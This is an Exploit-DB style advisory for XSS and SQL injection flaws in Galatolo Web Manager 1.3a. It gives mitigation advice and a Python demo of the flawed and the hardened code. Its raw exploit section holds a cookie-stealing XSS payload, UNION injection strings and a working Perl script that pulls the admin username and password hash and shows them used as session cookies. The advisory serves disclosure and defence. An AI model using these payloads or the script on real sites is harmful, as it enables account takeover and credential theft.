Vendor: Galatolo Web Manager
By: StAkeR
CVSS: 8.8 (HIGH)
Vulnerability: XSS and SQL Injection
CWE: 79, 89
Product Name: Galatolo Web Manager
Affected Version From: 1.3a
Affected Version To: 1.3a
Patch Exists: YES
Related CWE: N/A
CPE: a:galatolo_web_manager:galatolo_web_manager:1.3a
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2008

Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability

Galatolo Web Manager (GWM) version 1.3a is vulnerable to reflected cross-site scripting and remote SQL injection. The 'tag' parameter of the 'all.php' script is written back into the page without encoding, so an attacker can craft a link that executes arbitrary JavaScript in the browser of any victim who follows it. The 'id' parameter of the 'index.php' script in the 'users' plugin is placed unescaped into a SQL query, so a UNION-based injection can read arbitrary data from the application database; the published exploit uses it to retrieve usernames and password hashes from the 'users' table.

Mitigation:

Upgrade to a patched release (the vendor lists a fix for this version). In the code, bind the 'id' parameter with a prepared statement or cast it to an integer before it reaches the query, and HTML-encode the 'tag' parameter (and any other reflected input) before writing it into the page; input validation alone is not sufficient against either class of bug. The exploit output shows that a stolen hash can be placed directly in the gwm_pass cookie, so any hashes disclosed through this flaw should be treated as live credentials and the affected passwords reset.
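The two flaws and their fixes, as an added example that is not part of the original advisory or of GWM's code. GWM is a PHP/MySQL application; this stand-in uses Python with an in-memory SQLite database, a constructed 'users' table (not GWM's real schema) and constructed sample rows. The UNION payload keeps the shape the advisory uses (four columns, -1 to empty the legitimate result, a trailing comment), with SQLite's || in place of MySQL's concat().

```python
import html
import sqlite3

# Constructed sample data (not GWM's real schema or users). The pass column holds
# 32-character hex digests, which is what the advisory's exploit scrapes for.
SAMPLE_USERS = [
    (1, "admin", "admin@example.com", "site administrator",
     "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "editor", "editor@example.com", "writes articles",
     "0d107d09f5bbe40cade3de5c71e9e9b7"),
]

# Same structure as the advisory's plugins/users/index.php?id= payload:
# -1 makes the original WHERE match nothing, the UNION adds one attacker-chosen
# row whose second column carries user:pass, and "--" comments out the rest.
UNION_PAYLOAD = "-1 UNION SELECT NULL, user || ':' || pass, NULL, NULL FROM users WHERE id=1--"

# The advisory's all.php?tag= payload.
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def make_db():
    """Build the in-memory database with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, email TEXT, "
        "bio TEXT, pass TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def profile_vulnerable(db, id_param):
    """Mirrors the flaw: the request parameter is pasted straight into the SQL."""
    query = f"SELECT id, user, email, bio FROM users WHERE id={id_param}"
    return db.execute(query).fetchall()


def profile_safe(db, id_param):
    """Hardened: accept only an integer, then bind it as a parameter."""
    try:
        user_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    return db.execute(
        "SELECT id, user, email, bio FROM users WHERE id=?", (user_id,)
    ).fetchall()


def render_tag_vulnerable(tag):
    """Reflects the parameter unencoded, as all.php?tag= does."""
    return f"<h2>Tag: {tag}</h2>"


def render_tag_safe(tag):
    """HTML-encodes before writing into the page; the script tag becomes inert text."""
    return f"<h2>Tag: {html.escape(tag, quote=True)}</h2>"


if __name__ == "__main__":
    db = make_db()
    # Vulnerable: the UNION row comes back with admin:<hash> in the display column.
    print(profile_vulnerable(db, UNION_PAYLOAD))
    # Hardened: the payload never reaches the database.
    try:
        profile_safe(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
    print(render_tag_vulnerable(XSS_PAYLOAD))
    print(render_tag_safe(XSS_PAYLOAD))
```

The integer cast is the right fix here because the parameter is a numeric id; for string parameters the same binding applies without the cast. Note that html.escape() is the correct encoding only for an HTML text or attribute context; a value written into a script block or URL needs that context's encoding instead.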

Exploit-DB raw data:

--==+============================================================================+==--
--==+   Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability    +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
 [+] Discovered On: 14 Jul 2008
 [+] Download: http://gwm.dev-area.org/view.php?id=8

 [*] Vulnerabilities:
 
 [*] XSS <= 1.3a
 [+] all.php?tag= [Code Javascript]
 [+] http://site.com/all.php?tag=<script>alert(document.cookie)</script>
 
 [*] SQL (plugin users) 1.3a
 [+] plugins/users/index.php?id= [Code SQL]
 [+] -1+union+select+null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version())+from+users+where+id=1--
 
 [*] Exploit:

 #!/usr/bin/perl
 # Galatolo Web Manager 1.3a (plugin users) remote SQL injection
 # Pulls user and pass (md5(md5(password))) out of the users table with a
 # UNION SELECT and scrapes them back out of the returned page.
 use strict;
 use warnings;
 use LWP::UserAgent;

 my $host = shift;
 my ($ua,$resp,@login);
 # Column 2 of the UNION row is wrapped in '%' (0x25) so it can be located in the HTML
 my $evilxx = "/plugins/users/index.php?id=-1+union+select+1,concat(0x25,user,0x25,pass),null,null+from+users+where+id=1--";

 if(defined $host && $host =~ m{^http://}i)
 {
   $host =~ s{/+$}{};                 # avoid http://site.com//plugins/...
   $ua = LWP::UserAgent->new;
   $ua->timeout(10);                  # a 1-second timeout misreports slow hosts as not vulnerable
   $ua->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
   $resp = $ua->get($host.$evilxx);

   if($resp->is_success)
   {
     # %<username>%<32 hex chars>: the marker pattern injected above
     if($resp->content =~ /%(.+?)%([0-9a-f]{32})/)
     {
       push(@login,$1,$2);
       print "[+] Login:\n";
       print "[+] Username: $login[0]\n";
       print "[+] Password: $login[1]\n\n";

       # GWM accepts the stored hash directly in the gwm_pass cookie
       print "[+] Cookie Session:\n";
       print "[+] gwm_user = $login[0]\n";
       print "[+] gwm_pass = $login[1]\n\n";

       print "[+] Crack Password:\n";
       print "[+] md5(md5(password)) for crack:\n";
       print "[+] http://passcracking.com\n";
     }
     else
     {
       print "[+] Exploit Failed\n";
       print "[+] Site Not Vulnerable\n";
     }
   }
   else
   {
     # Distinguish a transport/HTTP failure from a non-vulnerable target
     print "[+] Request Failed: ", $resp->status_line, "\n";
   }
 }
 else
 {
   print "[+] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
   print "[+] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
   print "[+] Usage: perl $0 <host>\n";
   print "[+] Usage: perl $0 http://site.com\n";
 }

# milw0rm.com [2008-07-15]